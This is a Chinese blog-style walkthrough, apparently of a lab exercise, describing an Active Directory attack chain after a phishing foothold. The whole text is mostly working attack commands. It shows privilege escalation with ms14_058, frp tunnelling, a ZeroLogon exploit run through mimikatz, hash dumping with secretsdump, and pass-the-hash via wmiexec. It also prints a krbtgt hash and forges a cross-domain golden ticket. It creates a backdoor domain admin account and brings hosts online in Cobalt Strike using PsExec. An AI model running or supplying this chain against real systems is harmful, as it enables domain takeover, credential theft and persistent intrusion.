本文介绍了一种通过钓鱼攻击获取外网服务器控制权后的域攻防技术流程,包括提权、域横向移动、哈希传递、黄金票据制作等关键步骤。
内容:
信息收集,提权,代理搭建,域横向移动,哈希传递,票据制作,跨域攻击,上线方式
环境如下:
以钓鱼形式拿下第一台外网服务器,记得设置beacon响应为实时
首先打开一个记事本准备复制粘贴要用到的数据
可以看到我们不是最高权限,第一步肯定是要进行权限提升的,先进行主机信息的收集,查看主机的系统版本,修复的补丁
本电脑为win7 可以看到收集的信息为三级域名,三个补丁
指令:
shell systeminfo
其他的先不多想,进行提权,根据版本信息和补丁,ms14_058可以提权
提权成功
拿下最高权限可以做后门权限维持,计划任务等等,这里就不多说了
最高权限也就代表这台主机是我们的了,那我们刚才看到了主机信息有三级域名,可以猜测有内网环境,我们进行网卡信息查看
指令:
shell ipconfig /all
可以看到有域环境,双网卡,DNS首选为10.10.3.6,这时候进行内网主机存活扫描,并获得上级域的计算机名和真实ip
这里用了nbtscan工具辅助扫描
查看扫描结果,主要看dc,为域控标志,这里要把计算机名字记录好,票据会用到
既然要做域横向移动那必须上传mimikatz
利用mimikatz扫一下有没有cve2020-1472漏洞
指令:
lsadump::zerologon /target:域控IP /account:域控主机名$
这里是存在的,因为内网和我们渗透机ip不在一个网段,是不能互通的,所以这里做下代理
我们把这两个文件上传
渗透机开启端口映射准备接收
利用cs将上传的响应启动,我们渗透机则显示连接成功
指令:
shell frpc.exe -c frp.ini
将kali的代理设置好,我们用7000端口接收碰撞,也就是在目标机上利用另一个端口连接流量
准备就绪开始利用cve进行置空域用户
指令:
shell mimikatz "lsadump::zerologon /target:域控ip /account:域控主机名$ /exploit" "exit"
成功后我们在kali利用secretsdump进行无密码提出散列值,将管理员和krbtgt的哈希记录
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accb
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c696e9337845d8ada46612d047e40209
指令:
proxychains impacket-secretsdump -no-pass -just-dc 域名.com/域控主机名\$@域控ip
现在可以利用wmiexec进行哈希传递登录了
指令:
proxychains python3 wmiexec.py -hashes 获得的hash ./用户名@域控ip
现在将三个文件拉出来保存在我们的本地
分别是sam,system,security
我们需要将域控恢复正常,不然无法正常访问
例如我们直接看虚拟机这,我直接输入正确密码都是错误的
我们先利用secretsdump将文件中的散列值提出,主要为了原本的机器码
指令:
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
利用reinstall_original_pw进行还原
指令:
proxychains python3 reinstall_original_pw.py 域控主机名 域控ip 机器码hash
显示成功,我们可以直接来到虚拟机这里实验,直接登陆上来了
回到主轨,这时候我们先上线cs,直接用wmiexec哈希传递登录上传cs执行就可以了,但是要在cs这里做中转,相当于利用了外网的服务器做跳板,所以这里监听也写外网的内网网卡ip
将新生成的cs马启动
来到cs看到已经上线了
已经是最高权限了,这时候就是新的信息收集,这一部分忽略 我们知道还有父域的10.10.3.5所以我们要开始制作黄金票据了,首先上传mimikatz获取父子域的sid(就像实名制会员卡一人一张,计算机也一样)
指令:
shell mimikatz "privilege::debug" "lsadump::lsa /patch /user:administrator$" "lsadump::trust /patch" "exit"
黄金票据的几个要点我用txt列出来了
指令:
shell "kerberos::golden /user:administrator /domain:现在所在域控名.com /sid:子域控sid /sids:父域sid-519 /krbtgt:c696e9337845d8ada46612d047e40209 /ptt" "exit"
进行票据攻击,显示成功
但是去响应却失败
换一种思路,将3389打开并创建新的域控用户进行远程实现黄金票据
指令:
shell net user test QWEasd123 /add /domain//创建域用户
shell net group "Domain Admin" test /add /domain//添加到域管理员组
开启3389端口远程服务
进行远程登录
登录之后进行黄金票据攻击
这里成功可以交互了
上传cs的exe并利用PsExec.exe进行上线
运行exe文件查看cs是否上线,可以看到父域上线并且是最高权限
扫一扫
2065
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
